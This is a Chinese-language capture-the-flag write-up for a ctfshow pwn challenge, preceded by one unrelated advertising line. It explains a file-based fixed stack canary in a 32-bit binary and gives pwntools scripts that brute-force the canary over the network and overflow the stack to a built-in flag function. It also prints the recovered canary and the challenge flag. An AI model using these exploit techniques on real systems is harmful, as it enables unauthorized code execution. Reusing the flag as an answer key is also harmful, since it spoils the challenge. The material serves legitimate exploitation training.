绵阳营销型网站建设千锋教育课程
再多一眼看一眼就会爆炸
还是 32 位程序
虽然没有检测到 canary 保护
但是在主函数中看到了 canary 函数
跟进看看
从文件中读取 4 个字节的 canary 值,存入 global_canary
我们再来看 ctfshow 函数:
canary 的值放到了 s1
nbytes 决定着我们的读入长度,并且这个值我们可控,那就可以溢出
最后会比较 s1 和 global_canary 是否一样,不一样就退出程序
说白了就是一个 canary 保护
只不过这个 canary 值是从文件里面读取的
因为这里没有打印栈上内容的操作,我们无法覆盖低字节来泄露 canary
但是由于它是从文件中读取的,所以 canary 实际上是一个固定的值
我们可以爆破 canary 的值,32 位程序的 canary 的大小是 4 个字节
爆破脚本:
# @author:My6n
# @time:20250611
from pwn import *context.log_level = 'error'
canary = b''for i in range(4):for b in range(256):try:io = remote('pwn.challenge.ctf.show', 28259)io.sendlineafter(">", "1000")io.sendafter("$ ", b"a" * 0x20 + canary + p8(b))if b"Where is the flag?" in io.recv(timeout=1):canary += p8(b)print(f"[+] Found byte {i}: {hex(b)}")breakexcept:passfinally:io.close()print(f"[+] Canary = {canary.hex()} ({canary})")
拿到 canary 的值:36D!
程序自带获取 flag 的函数
地址:0x8048696
接下来就可以写 exp 了:
填满 buf 填 canary(s1)
然后填 v5
然后填 ebp
然后就是返回地址了
# @author:My6n
# @time:20250611
from pwn import *
io = remote('pwn.challenge.ctf.show', 28259)
context.log_level = 'debug'
context.arch = 'i386'
canary = b'36D!'
io.sendlineafter(b'How many bytes do you want to write to the buffer?\n>',b'1000')
payload = flat(cyclic(0x20),canary,b'a'*0xc,0,0x08048696)
io.sendlineafter(b'$ ',payload)
io.interactive()
拿到 flag:ctfshow{de9d5faf-21d6-4317-becd-3b214681c7a2}